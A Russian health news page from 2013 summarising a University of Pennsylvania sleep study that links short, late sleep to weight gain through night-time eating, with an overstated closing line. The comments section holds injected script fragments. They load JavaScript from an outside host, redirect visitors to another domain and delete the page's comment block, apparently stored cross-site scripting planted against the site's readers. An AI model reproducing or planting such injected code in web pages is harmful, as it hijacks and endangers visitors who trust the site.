Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Во сколько лечь спать, чт...  >>  Во сколько лечь спать, чтобы похудеть? Ученые выяснили точное время!
 
Обратная связь
 

Во сколько лечь спать, чтобы похудеть? Ученые выяснили точное время!

Размер шрифта
01 августа 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

В новом исследовании показано, что у здоровых взрослых людей, которые поздно ложатся спать, повышен риск развития ожирения. Причиной является чрезмерное потребление калорийной пищи в поздние часы.

«Аналогичная закономерность (мало сна – лишние килограммы) уже выявлялась ранее в некоторых эпидемиологических исследованиях», – отмечает Андреа Спэт, глава исследования, докторант Университета Пенсильвании в Филадельфии (США). «Мы же впервые наблюдали этот феномен в условиях поставленного эксперимента».

Данная работа, результаты которой были опубликованы в июльском номере журнала SLEEP («Сон»), была выполнена в лаборатории сна и хронобиологии, расположенной в клинике Университета Пенсильвании. Участниками исследования стали 225 здоровых индивидов без признаков ожирения в возрасте 22-50 лет. 

Испытуемые были разделены на две группы: экспериментальную и контрольную. В первой установленная продолжительность сна составила четыре часа (с 4:00 до 8:00), во второй – десять часов (с 22:00 до 8:00). Участники исследования придерживались такого режима на протяжении восемнадцати дней. Приемы пищи были регламентированы, однако доступ к кухне и заветному холодильнику никак не ограничивался, равно как и передвижения и досуг в пределах лаборатории (с одной оговоркой – никаких физических нагрузок).

В итоге выяснилось, что масса тела у людей из первой группы увеличивалась в значительно большей степени. Объясняется этот феномен тем, что в вечерние и ночные часы люди охотнее бегут к холодильнику, увеличивая таким образом суточное потребление калорий.

Интересно, что описываемый феномен имеет половые и расовые особенности, а именно – мужской пол и негроидная раса предрасполагают к набору массы тела. Причины этой предрасположенности будут изучаться в грядущих исследованиях.

Ожирение – фактор риска многих соматических заболеваний, таких как: сахарный диабет, обструктивное ночное анпоэ, ишемическая болезнь сердца и многие другие. Понимание различных механизмов, обуславливающих его развитие, важно для дальнейшей модификации стратегии лечения этой патологии.

Так что ложитесь спать пораньше и худейте, ничего не делая!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В новый год – с новым весом!   Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как воспитывать ребенка, чтобы он не был толстым?   Старт нового сезона проекта «Сбрось лишнее»  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
28 июня 2013Хотите похудеть – пейте таблетки от эректильной дисфункции! 11 июня 2013Для похудения больше не нужна операция! Новый метод лечения делает потерю веса плевым делом
 

Слайдшоу

1
5 способов похудеть без диеты. Часть 2
Привычки, котрые сделают вас толстой в Новом году
Как похудеть, ничего не делая

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.